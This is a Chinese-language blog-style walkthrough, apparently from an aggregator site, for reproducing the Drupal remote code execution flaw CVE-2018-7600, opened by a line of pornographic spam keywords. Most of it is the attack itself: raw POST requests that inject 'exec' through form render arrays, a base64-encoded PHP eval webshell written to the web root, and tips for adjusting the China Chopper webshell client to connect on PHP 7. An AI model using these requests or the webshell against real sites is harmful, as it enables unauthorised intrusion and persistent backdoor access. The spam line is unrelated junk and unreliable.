国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。


一、漏洞描述

drupal是一個(gè)開源PHP管理系統(tǒng),架構(gòu)使用的是php環(huán)境+mysql數(shù)據(jù)庫(kù)的環(huán)境配置。在Drupal 6.x,7.x,8.x系列的版本中,均存在遠(yuǎn)程代碼執(zhí)行漏洞。該漏洞產(chǎn)生的原因在于Drupal對(duì)表單渲染時(shí)未進(jìn)行嚴(yán)格的安全過濾,導(dǎo)致,攻擊者可以利用該漏洞攻擊Drupal系統(tǒng)的網(wǎng)站,執(zhí)行惡意代碼。


二、POC&EXP

首先需要確定目標(biāo)的版本,可以通過訪問目標(biāo)站點(diǎn)的以下兩個(gè)文件去確定(當(dāng)然也可以通過信息搜集識(shí)別站點(diǎn)的cms版本):

http://target_ip:port/core/CHANGELOG.txt
http://target_ip:port/CHANGELOG.txt

drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)
當(dāng)目標(biāo)為存在漏洞的版本時(shí),則很可能存在相關(guān)漏洞。先用網(wǎng)上公開的POC去驗(yàn)證,訪問以下地址:

http://target_ip:port/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

然后抓取該頁(yè)面的數(shù)據(jù)包,并將整個(gè)數(shù)據(jù)包替換為如下內(nèi)容:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: target_ip:port
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

修改其中的HOST參數(shù)為目標(biāo)站點(diǎn)的IP和端口即可。
當(dāng)回顯內(nèi)容出現(xiàn)id命令執(zhí)行的結(jié)果則證明漏洞存在:
drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)
接著可以開始寫入webshell。需要注意的是,drupal會(huì)過濾>,因此有出現(xiàn)>的地方都要設(shè)法用別的內(nèi)容代替。
這里先寫好webshell內(nèi)容:
<?php eval($_REQUEST[8]) ;?>
進(jìn)行base64編碼:
PD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pIDs/Pg==
構(gòu)造命令:
echo “PD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pIDs/Pg==” |base64 -d |tee test.php
這里的base64 -d是指將前面的字符串進(jìn)行base64解碼再輸出,而tee則是將結(jié)果輸出并將結(jié)果寫入到指定的文件中。
之后構(gòu)造數(shù)據(jù)包如下:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: target_ip:port
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 173

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=echo “PD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pIDs/Pg==” |base64 -d |tee test.php

該文件寫入后會(huì)出現(xiàn)在網(wǎng)站根目錄下??梢栽谀繕?biāo)的根目錄下訪問該文件并傳參phpinfo();命令讓它執(zhí)行,若成功,則可以使用webshell管理工具連接該文件。
drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)
需要注意的是,如果使用中國(guó)菜刀進(jìn)行連接,而目標(biāo)站點(diǎn)如果是php7.x的版本,則會(huì)報(bào)錯(cuò)導(dǎo)致無法連接。此時(shí)應(yīng)修改菜刀的配置,把以下內(nèi)容:
array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));
改成:
eval(base64_decode('%s'));
之后即可正常連接。
drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-431373.html

到了這里,關(guān)于drupal遠(yuǎn)程代碼執(zhí)行 (CVE-2018-7600)漏洞學(xué)習(xí)與復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

    Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

    Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability對(duì)應(yīng)的cve編號(hào)為CVE-2022-30190,其能夠在非管理員權(quán)限、禁用宏且在windows defender開啟的情況下繞過防護(hù),達(dá)到上線的效果。 當(dāng)從Word等應(yīng)用程序使用 URL 協(xié)議調(diào)用 MSDT 時(shí)存在遠(yuǎn)程執(zhí)行代碼漏洞,攻擊者通過制作惡意的

    2024年02月08日
    瀏覽(43)
  • 漏洞復(fù)現(xiàn) CVE-2023-0297( pyload遠(yuǎn)程代碼執(zhí)行漏洞 )

    在 addcrypted2() 函數(shù)中,對(duì)傳入的參數(shù) jk 解析后用 eval_js() 作為 JS 語句執(zhí)行。 利用 JS 中 pyimport 導(dǎo)入 OS 包,執(zhí)行系統(tǒng)命令(文件操作,進(jìn)程管理),還可以利用 os.system() 執(zhí)行 shell 命令。 構(gòu)建 payload 過程比較簡(jiǎn)單,只要傳入所需的 package, crypted, jk, passwords 四個(gè)參數(shù)即可,這里

    2024年02月08日
    瀏覽(22)
  • Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    CVE-2017-11882允許攻擊者在當(dāng)前用戶的上下文中運(yùn)行任意代碼,導(dǎo)致無法正確處理內(nèi)存中的對(duì)象,即為“ Microsoft Office Memory Corruption Vulnerability “,棧溢出的遠(yuǎn)程執(zhí)行漏洞 該漏洞是在 EQNEDT32.EXE 組件的緩沖區(qū)溢出導(dǎo)致。當(dāng)受害用戶打開Office文檔時(shí)就有可能被漏洞利用,危害極大。

    2024年02月12日
    瀏覽(24)
  • CVE-2019-0708遠(yuǎn)程桌面服務(wù)遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)

    CVE-2019-0708遠(yuǎn)程桌面服務(wù)遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)

    1、相關(guān)簡(jiǎn)介 Windows再次被曝出一個(gè)破壞力巨大的高危遠(yuǎn)程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠(yuǎn)程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)

    2024年02月10日
    瀏覽(22)
  • [漏洞復(fù)現(xiàn)] jenkins 遠(yuǎn)程代碼執(zhí)行 (CVE-2019-100300)

    [漏洞復(fù)現(xiàn)] jenkins 遠(yuǎn)程代碼執(zhí)行 (CVE-2019-100300)

    擁有Overall/Read 權(quán)限的用戶可以繞過沙盒保護(hù),在jenkins可以執(zhí)行任意代碼。此漏洞需要一個(gè)賬號(hào)密碼和一個(gè)存在的job。 Jenkins的pipeline主要是通過一個(gè)配置文件或者job里面的pipeline腳本配置來設(shè)定每個(gè)job的步驟. pipeline定義了幾乎所有要用到的流程, 比如執(zhí)行shell, 存檔, 生成測(cè)試

    2024年02月16日
    瀏覽(21)
  • CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)! 再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試! CVE-2019-11043漏

    2024年02月06日
    瀏覽(22)
  • PhpMyAdmin遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn) (CVE-2016-5734)

    0x01 漏洞介紹 phpMyAdmin是phpMyAdmin團(tuán)隊(duì)開發(fā)的一套免費(fèi)的、基于Web的MySQL數(shù)據(jù)庫(kù)管理工具。該工具能夠創(chuàng)建和刪除數(shù)據(jù)庫(kù),創(chuàng)建、刪除、修改數(shù)據(jù)庫(kù)表,執(zhí)行SQL腳本命令等。 phpMyAdmin 中存在安全漏洞,該漏洞源于程序沒有正確選擇分隔符來避免使用 preg_replace e 修飾符。 可借助特

    2024年02月11日
    瀏覽(19)
  • 復(fù)現(xiàn)CVE-2022-10270(向日葵遠(yuǎn)程代碼執(zhí)行漏洞)

    復(fù)現(xiàn)CVE-2022-10270(向日葵遠(yuǎn)程代碼執(zhí)行漏洞)

    目錄 引言 漏洞描述 影響版本: 原理: 環(huán)境搭建 手動(dòng)復(fù)現(xiàn) 腳本復(fù)現(xiàn) 修復(fù)建議 ? ? ? ? 本文內(nèi)容僅供學(xué)習(xí)參考,若讀者利用本文內(nèi)容做出違法行為,筆者不提供擔(dān)保?。?! ????????向日葵是一款免費(fèi)的,集遠(yuǎn)程控制電腦手機(jī)、遠(yuǎn)程桌面連接、遠(yuǎn)程開機(jī)、遠(yuǎn)程管理、支持

    2024年02月07日
    瀏覽(22)
  • 【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2022-30190)

    【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。 0x02 漏洞簡(jiǎn)介 該文檔使用 Word 遠(yuǎn)程模板功能從遠(yuǎn)程網(wǎng)絡(luò)服務(wù)器檢索 HTML 文件,該服務(wù)器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過

    2024年02月05日
    瀏覽(19)
  • 解決 遠(yuǎn)程 服務(wù)器--Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞(CVE-2018-0886)【原理掃描】(KB4103725 或 KB4103715)

    解決 遠(yuǎn)程 服務(wù)器--Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞(CVE-2018-0886)【原理掃描】(KB4103725 或 KB4103715)

    系統(tǒng): windows server 2012 R2 standard 掃描出漏洞: Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞(CVE-2018-0886)【原理掃描】 按照微軟官方給的答案: https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886,對(duì)應(yīng)下載安裝包是 KB4103725 或 KB4103715 但是下載后安裝 報(bào)錯(cuò): 此更新不適用此

    2024年02月06日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包